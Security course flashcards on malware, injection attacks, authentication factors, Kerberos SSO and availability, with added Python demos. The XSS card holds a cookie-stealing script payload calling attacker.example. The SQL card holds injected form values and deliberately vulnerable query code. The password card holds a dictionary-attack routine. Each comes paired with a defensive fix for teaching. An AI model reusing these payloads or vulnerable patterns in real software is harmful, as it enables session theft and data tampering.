Ch.16 - Protecting Information Assets Flashcards

1
Q

What is Malicious Software?

A
- Software that:
• Causes damage
• Escalates security privileges
• Divulges private data
• Modifies or deletes data
2
Q

Malicious Software (malware)

A

Any program that carries out actions that you do not intend

3
Q

Malicious Code and Activity

A
  • Malicious code attacks all three information security properties:
    o Confidentiality: Disclose your org’s private info
    o Integrity: Modify database records – immediately or over period of time
    o Availability: Erase/overwrite files or inflict considerable damage to storage media
4
Q

Virus

A

Attaches itself to or copies itself into another program on the computer
• Tricks the computer into following instructions not intended by the original program developer
• Infects a host program and may cause that host program to copy the virus to other programs and computers
• The user who runs the infected program activates the virus, which then executes with that user's privileges

5
Q

Trojan Horse

A

Malware that masquerades as useful program
• Hide programs that collect sensitive information
• Open backdoors into computers
• Actively upload and download files

6
Q

Rootkit

A

Modifies/replaces one or more existing programs to hide traces of attacks
• Many different types of rootkits
• Conceals its existence once installed
• Is difficult to detect and remove

7
Q

Spyware

A

Type of malware that specifically threatens confidentiality of info
• Monitors keystrokes
• Scans files on the hard drive
• Snoops other applications
• Installs other spyware programs
• Reads cookies
• Changes default homepage on the web browser

8
Q

Ransomware

A

Attempts to generate funds directly from the computer user
• Attacks a computer and limits the user's ability to access the computer's data
• Encrypts important files or even the entire disk and makes them inaccessible until a ransom is paid (paying does not guarantee recovery)
• A widely reported early example of file-encrypting ransomware was CryptoLocker (2013); tested offline backups are the primary recovery control

9
Q

Spam

A

Mass mailing of identical messages to a large number of users
• Consumes computing resources: bandwidth, mail storage, and CPU time
• Diverts IT personnel from activities more critical to network security
• Is a potential carrier of malicious code (attachments, links to malware or phishing pages)
• Compromises intermediate systems (open relays, infected hosts) to facilitate remailing
• Opt-out (unsubscribe) features in spam messages can represent a form of reconnaissance attack: a click confirms the address is live and read

10
Q

Worms

A

Designed to propagate from one host machine to another using the host's own network communications protocols
• Unlike viruses, do not require a host program to survive and replicate; they typically exploit a network-reachable vulnerability or weak credentials
• The term "worm" stems from the fact that the earliest worms were programs with segments running on different computers, all communicating over a network

11
Q

Logic Bombs

A

Programs that execute a malicious function of some kind when they detect certain conditions (for example a particular date, or an account being removed)
• Typically originate with org insiders, because people inside the org generally have more detailed knowledge of the IT infrastructure than outsiders

12
Q

Injection

A
Attacks that insert attacker-controlled data into a program or its inputs so that the data is interpreted as code or commands rather than as data:
• Cross-site scripting (XSS)
• SQL injection
• LDAP injection
• XML injection
• Command injection
13
Q

XSS and SQL Injection

A

Target public-facing web applications: SQL injection reaches the back-end database through the server, while XSS uses the server to deliver attacker script to other users' browsers

14
Q

Cross-site scripting (XSS)

A

Attack in which attacker-supplied script is delivered through a trusted website and executed in other users' browsers
• The web application copies untrusted input (a search term, a comment, a URL parameter) into a page without escaping it, so the browser treats the input as HTML/JavaScript
• Reflected (payload carried in a crafted link), stored (payload saved server-side and served to every visitor), and DOM-based (client-side script inserts the input) variants
• The script runs in the victim's session on the trusted site: it can read page content and non-HttpOnly cookies, submit requests as the user, and deface or redirect the page
• Defense is context-aware output encoding of all untrusted data, backed by input validation and a Content Security Policy
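The reflected case from this card, as an added example (not code from the flashcard source): a search page that echoes the query, first concatenated raw and then HTML-escaped, plus a link renderer showing that attribute context needs a scheme check on top of escaping. The payload, page templates and `attacker.example` host are constructed for the demo.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input: the kind of search term a crafted link would carry.
XSS_PAYLOAD = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'

def render_search_vulnerable(query: str) -> str:
    """Reflected XSS: the untrusted query is concatenated straight into the page body."""
    return f"<h1>Results for {query}</h1>"

def render_search_safe(query: str) -> str:
    """Hardened: HTML-escape untrusted data before it lands in element content."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"

def render_link_safe(url: str) -> str:
    """Attribute context needs more than escaping: a javascript: URL is harmless as text
    but executes when clicked, so restrict the scheme as well as escaping quotes."""
    if urlsplit(url.strip()).scheme.lower() not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">link</a>'

def contains_script_element(page: str) -> bool:
    """Demo check: would a browser parse a real <script> element out of this page?"""
    return "<script" in page.lower()
```

Escaping is per context: the same `html.escape` call is right for element content and quoted attributes, but a URL attribute, an inline event handler or a `<script>` block each need their own encoding rules.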

15
Q

SQL injection

A

Web applications take data from remote, untrusted sources and use it to build database queries; most of the computing world depends on information kept in databases
• When untrusted input is concatenated into the SQL text instead of being passed as a bound parameter, an attacker can change the query: read other tables, modify or delete data with INSERT/UPDATE/DELETE, or change a shopping cart price from $195.00 to $1.95 (ex)
• Defense is parameterized queries (prepared statements), type validation of input, and a least-privilege database account
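The cart-price example above, worked as an added demo against an in-memory SQLite database (this is not code from the flashcard source). The table, rows and the two injected form values are constructed; the vulnerable functions concatenate input into SQL, the safe ones validate and bind parameters.

```python
import sqlite3

def make_cart() -> sqlite3.Connection:
    """Constructed sample data: two cart lines, the headset priced at $195.00."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cart (id INTEGER PRIMARY KEY, item TEXT, qty INTEGER, price REAL)")
    conn.executemany("INSERT INTO cart VALUES (?, ?, ?, ?)",
                     [(7, "headset", 1, 195.00), (8, "cable", 2, 9.50)])
    conn.commit()
    return conn

# Attacker-supplied form values (constructed): one hijacks an UPDATE, one a SELECT.
INJECTED_QTY = "1, price = 1.95"
INJECTED_ITEM = "x' OR '1'='1"

def update_qty_vulnerable(conn, cart_id: str, qty: str) -> None:
    """Form fields are pasted into the SQL text, so 'qty' can smuggle in a second assignment."""
    conn.execute(f"UPDATE cart SET qty = {qty} WHERE id = {cart_id}")
    conn.commit()

def update_qty_safe(conn, cart_id: str, qty: str) -> None:
    """Validate types first, then bind parameters: the driver never parses the value as SQL."""
    qty_i, id_i = int(qty), int(cart_id)      # int("1, price = 1.95") raises ValueError
    if qty_i < 1:
        raise ValueError("quantity must be positive")
    conn.execute("UPDATE cart SET qty = ? WHERE id = ?", (qty_i, id_i))
    conn.commit()

def lookup_vulnerable(conn, item: str) -> list:
    """Tautology injection turns a single-item lookup into a dump of the whole table."""
    return conn.execute(f"SELECT id, item, price FROM cart WHERE item = '{item}'").fetchall()

def lookup_safe(conn, item: str) -> list:
    return conn.execute("SELECT id, item, price FROM cart WHERE item = ?", (item,)).fetchall()

def price_of(conn, cart_id: int) -> float:
    return conn.execute("SELECT price FROM cart WHERE id = ?", (cart_id,)).fetchone()[0]

def demo_vulnerable_update() -> float:
    conn = make_cart()
    update_qty_vulnerable(conn, "7", INJECTED_QTY)   # becomes: SET qty = 1, price = 1.95
    return price_of(conn, 7)

def demo_safe_update() -> float:
    conn = make_cart()
    try:
        update_qty_safe(conn, "7", INJECTED_QTY)
    except ValueError:
        pass                                   # request rejected, nothing changes
    return price_of(conn, 7)
```

The vulnerable UPDATE needs no second statement and no comment trick, which is why "we block semicolons" is not a defense; binding parameters is.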

16
Q

Logical Access Control Solutions

A

Biometrics
Tokens
Passwords
Single Sign-On (SSO)

17
Q

Biometrics

A

▪ Static: Fingerprints, iris granularity, retina blood vessels, facial features, and hand geometry
▪ Dynamic: Voice inflections, keyboard strokes, and signature motions

18
Q

Tokens

A

▪ Synchronous or asynchronous

▪ Smart cards and memory cards

19
Q

Passwords

A

▪ Stringent password controls for users
▪ Account lockout policies
▪ Auditing logon events

20
Q

Single Sign-On (SSO)

A

▪ Kerberos process

▪ Secure European System for Applications in a Multi Vendor Environment (SESAME)

21
Q

Authentication Types

A
Knowledge
Ownership
Characteristics (Biometrics)
Location
Action
22
Q

Knowledge

A
Something you know
o Password
▪ Weak passwords easily cracked by brute-force or dictionary attack
▪ Password best practices
o Passphrase
▪ Stronger than password
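An added example (not from the flashcard source) covering both the Passwords card and this one: a dictionary attack against an unsalted hash, the salted slow-hash storage that blunts it, and a lockout policy with an audit trail. The wordlist, user names and records are constructed; the 600,000 PBKDF2 iterations default is an assumption chosen for illustration.

```python
import hashlib, hmac, os
from typing import Optional

# Constructed mini wordlist; real attacks use hundreds of millions of leaked passwords.
WORDLIST = ["123456", "password", "qwerty", "letmein", "Summer2024!", "password123"]

def weak_store(password: str) -> str:
    """Legacy scheme: one unsalted SHA-256, the kind of hash found in many breach dumps."""
    return hashlib.sha256(password.encode()).hexdigest()

def dictionary_attack(stored_hash: str, wordlist) -> Optional[str]:
    """Offline guessing: one cheap hash per candidate, and the work is reusable across users."""
    for candidate in wordlist:
        if weak_store(candidate) == stored_hash:
            return candidate
    return None

def strong_store(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Salted, slow PBKDF2-HMAC-SHA256: each guess costs `iterations` hashes and each user's
    salt forces the attacker to start over per account."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def strong_verify(password: str, record: str) -> bool:
    _, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

class LoginGuard:
    """Account lockout after `threshold` consecutive failures, with every attempt audited."""
    def __init__(self, threshold: int = 5):
        self.threshold, self.failures, self.audit = threshold, {}, []

    def attempt(self, user: str, password: str, record: str) -> str:
        if self.failures.get(user, 0) >= self.threshold:
            outcome = "locked"
        elif strong_verify(password, record):
            self.failures[user] = 0
            outcome = "ok"
        else:
            self.failures[user] = self.failures.get(user, 0) + 1
            outcome = "denied"
        self.audit.append((user, outcome))        # feed to the logon-event audit log
        return outcome
```

Lockout stops online guessing only; once the hash database leaks, the guessing is offline and only the slow, salted hash and the password's length keep the dictionary attack expensive.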
23
Q

Ownership

A
Something you have
o Synchronous token—Calculates number at both authentication server and device
▪ Time-based synchronization system
▪ Event-based synchronization system
▪ Continuous authentication
o Asynchronous token
▪ USB token
▪ Smart card
▪ Memory cards (magnetic stripe)
o Asynchronous Token Challenge-Response
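The token types on this card, as an added example (not from the flashcard source): an event-based synchronous token (HOTP, RFC 4226), a time-based one (TOTP, RFC 6238) with drift tolerance, and an asynchronous challenge-response token with one-shot challenges. The shared secret is the RFC test key; the HMAC-SHA256 response format is an assumption for the demo.

```python
import hashlib, hmac, os, struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """Event-based synchronous token (RFC 4226): HMAC-SHA1 over a counter both sides keep."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """Time-based synchronous token (RFC 6238): the shared counter is the current time step."""
    return hotp(secret, unix_time // step, digits)

def verify_totp(secret: bytes, code: str, now: int, step: int = 30, window: int = 1) -> bool:
    """Server side: tolerate `window` steps of clock drift, compare in constant time."""
    return any(hmac.compare_digest(totp(secret, now + d * step, step, len(code)), code)
               for d in range(-window, window + 1))

def challenge_response(secret: bytes, challenge: bytes) -> str:
    """Asynchronous token: the device answers a server nonce with HMAC(secret, nonce)."""
    return hmac.new(secret, challenge, hashlib.sha256).hexdigest()[:8]

class ChallengeServer:
    """Issues one-shot challenges, so a captured response cannot be replayed."""
    def __init__(self, secret: bytes):
        self.secret, self.outstanding = secret, set()

    def issue(self) -> bytes:
        challenge = os.urandom(16)
        self.outstanding.add(challenge)
        return challenge

    def check(self, challenge: bytes, response: str) -> bool:
        if challenge not in self.outstanding:          # unknown or already used
            return False
        self.outstanding.discard(challenge)
        return hmac.compare_digest(challenge_response(self.secret, challenge), response)
```

Synchronous tokens depend on the counter or clock staying aligned (hence the drift window and, for HOTP, a resynchronization look-ahead); the asynchronous design avoids that by making the server supply the freshness.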
24
Q

Characteristics (Biometrics)

A
Something unique to you
o Static (physiological) measures: What you are
o Dynamic (behavioral) measures: What you do
o Concerns Surrounding Biometrics
▪ Accuracy/Acceptability/Reaction time
o Types of Biometrics:
▪ Fingerprint
▪ Palm print
▪ Hand geometry
▪ Retina scan
▪ Iris scan
▪ Facial recognition
▪ Voice pattern
▪ Keystroke dynamics
▪ Signature dynamics

o Privacy Issues:
▪ Biometric technologies don’t just involve collecting data about person
▪ Biometrics collects info intrinsic to people – Every person must submit to an examination, and that examination must be digitally recorded and stored
• Unauthorized access to this data could lead to misuse

25
Q

Location

A

Somewhere you are
o Strong indicator of authenticity
o Additional information to suggest granting/denying access to resource

26
Q

Action

A

Something you do/how you do it
o Stores patterns/nuances of how you do something
o Record typing patterns

27
Q

Single Sign-On (SSO)

A
  • Sign on to a computer/network once
  • The resulting authentication credentials (for example a Kerberos ticket) allow the user to access all computers/systems they are authorized for
  • Reduces human error and password fatigue
  • Difficult to put in place, and a compromised SSO credential opens every connected system
28
Q

SSO Processes

A
  • Kerberos
  • Secure European System for Applications in a Multi-Vendor Environment (SESAME)
  • Lightweight Directory Access Protocol (LDAP), the directory service SSO systems typically query for identities and group membership
29
Q

Kerberos

A

1) User authenticates to the Kerberos client software on the workstation
a. Authentication may be a password (from which the user's secret key is derived) or a biometric method
2) The client sends an authentication request to the Kerberos server (the Key Distribution Center, KDC)
3) Shared secret keys are used: every user and every service shares a long-term key with the KDC
a. The KDC creates a ticket-granting ticket (TGT), encrypted with the KDC's own key, and sends it with a session key encrypted with the user's key
4) The client presents the TGT to the KDC's ticket-granting service and receives a service ticket for each server it wants to reach
a. Each service ticket is encrypted with that server's key, so only that server can read it; the client proves possession of the session key with a timestamped authenticator
5) User is signed in to all authorized servers without re-entering the password; tickets carry an expiry time, and the scheme depends on synchronized clocks
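The five steps above run end to end, as an added example (not code from the flashcard source or any Kerberos implementation). It is a simplified model: the toy authenticated cipher, the realm name `EXAMPLE.ORG`, the principals `alice`, `krbtgt` and `fileserver`, and the 8-hour lifetime are all constructed, and pre-authentication is omitted.

```python
import hashlib, hmac, json, os, time

# Toy authenticated cipher (SHA-256 keystream XOR + HMAC-SHA256 tag) standing in for the
# AES-based encryption types real Kerberos uses. Constructed for this demo, not for production.
def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    blocks = (n + 31) // 32
    return b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                    for i in range(blocks))[:n]

def seal(key: bytes, obj: dict) -> bytes:
    pt = json.dumps(obj).encode()
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()

def unseal(key: bytes, blob: bytes) -> dict:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("integrity check failed (wrong key or tampered ticket)")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

def user_key(password: str, salt: str = "EXAMPLE.ORG") -> bytes:
    """Step 1: the user's long-term key is derived from the password (string-to-key)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 10_000)

class KDC:
    """Authentication Service and Ticket-Granting Service; holds every principal's key."""
    def __init__(self, keys: dict, lifetime: int = 8 * 3600):
        self.keys, self.lifetime = keys, lifetime

    def as_exchange(self, client: str):
        """Steps 2-3: a session key sealed for the user, and a TGT sealed with the KDC's key.
        Real deployments require pre-authentication before handing out the TGT."""
        session, expires = os.urandom(32).hex(), int(time.time()) + self.lifetime
        tgt = seal(self.keys["krbtgt"], {"client": client, "session": session, "expires": expires})
        return seal(self.keys[client], {"session": session, "expires": expires}), tgt

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str):
        """Step 4: check TGT and authenticator, issue a service ticket sealed with the service's key."""
        t = unseal(self.keys["krbtgt"], tgt)
        auth = unseal(bytes.fromhex(t["session"]), authenticator)
        if (t["expires"] < time.time() or auth["client"] != t["client"]
                or abs(auth["ts"] - time.time()) > 300):
            raise ValueError("expired ticket or bad authenticator")
        svc_session = os.urandom(32).hex()
        ticket = seal(self.keys[service], {"client": t["client"], "session": svc_session,
                                           "expires": t["expires"]})
        return seal(bytes.fromhex(t["session"]), {"service": service, "session": svc_session}), ticket

class Service:
    def __init__(self, name: str, key: bytes):
        self.name, self.key = name, key

    def ap_exchange(self, ticket: bytes, authenticator: bytes) -> str:
        """Step 5: only this service can open the ticket; the authenticator proves the caller
        holds the session key inside it. Returns the authenticated client name."""
        t = unseal(self.key, ticket)
        auth = unseal(bytes.fromhex(t["session"]), authenticator)
        if t["expires"] < time.time() or auth["client"] != t["client"]:
            raise ValueError("rejected")
        return t["client"]

def client_login(kdc: KDC, service: Service, user: str, password: str) -> str:
    key = user_key(password)
    reply, tgt = kdc.as_exchange(user)
    session = bytes.fromhex(unseal(key, reply)["session"])   # a wrong password fails here
    auth = seal(session, {"client": user, "ts": int(time.time())})
    reply2, ticket = kdc.tgs_exchange(tgt, auth, service.name)
    svc_session = bytes.fromhex(unseal(session, reply2)["session"])
    return service.ap_exchange(ticket, seal(svc_session, {"client": user, "ts": int(time.time())}))

def demo(password: str = "correct-horse") -> str:
    """Constructed realm: one user, the KDC's own krbtgt key, one file server."""
    fs_key = os.urandom(32)
    kdc = KDC({"alice": user_key("correct-horse"), "krbtgt": os.urandom(32), "fileserver": fs_key})
    return client_login(kdc, Service("fileserver", fs_key), "alice", password)
```

Note where the password is (and is not) used: it never crosses the network, it only unlocks the AS reply on the workstation, and after that every hop is proven with a short-lived session key and a timestamped authenticator, which is what makes the single sign-on safe to reuse across servers.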

30
Q

Identifying Activities for Systems Availability

A

• Activities:
o System Access
o System Availability
o System Functions: Manual and Automated
• Eliminate single points of failure (SPOF)
o Part of system that can cause entire system to fail
o If SPOF fails, entire system fails

31
Q

System Access and Availability

A
  • Goal = 99.999% uptime ("five nines", about 5 minutes of downtime per year)
  • Failover cluster
  • RAID
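An added example (not from the flashcard source) putting numbers on the SPOF point from the previous card and the five-nines goal here: how availability composes for components in series (each a single point of failure) and for redundant replicas such as a failover cluster or mirrored RAID. The 0.999 per-component figures are constructed, and independent failures are assumed.

```python
import math

MINUTES_PER_YEAR = 365 * 24 * 60

def downtime_minutes_per_year(availability: float) -> float:
    """Downtime a given availability target permits in a non-leap year."""
    return (1.0 - availability) * MINUTES_PER_YEAR

def series(*components: float) -> float:
    """Components that must all be up: a chain in which each one is a single point of failure."""
    return math.prod(components)

def parallel(*replicas: float) -> float:
    """Redundant replicas where any one keeps the service up (failover cluster, mirrored RAID).
    Assumes independent failures; a shared power feed or switch breaks that assumption."""
    return 1.0 - math.prod(1.0 - a for a in replicas)

def web_tier_examples() -> dict:
    """Constructed figures: a 0.999 web server in front of a 0.999 database, then each tier doubled."""
    single = series(0.999, 0.999)
    clustered = series(parallel(0.999, 0.999), parallel(0.999, 0.999))
    return {"single_chain": single, "clustered": clustered,
            "single_chain_minutes": downtime_minutes_per_year(single),
            "clustered_minutes": downtime_minutes_per_year(clustered)}
```

Two 0.999 components in series lose about 17.5 hours a year; doubling each tier brings the same chain to roughly one minute, which is why removing single points of failure matters more than polishing any one component.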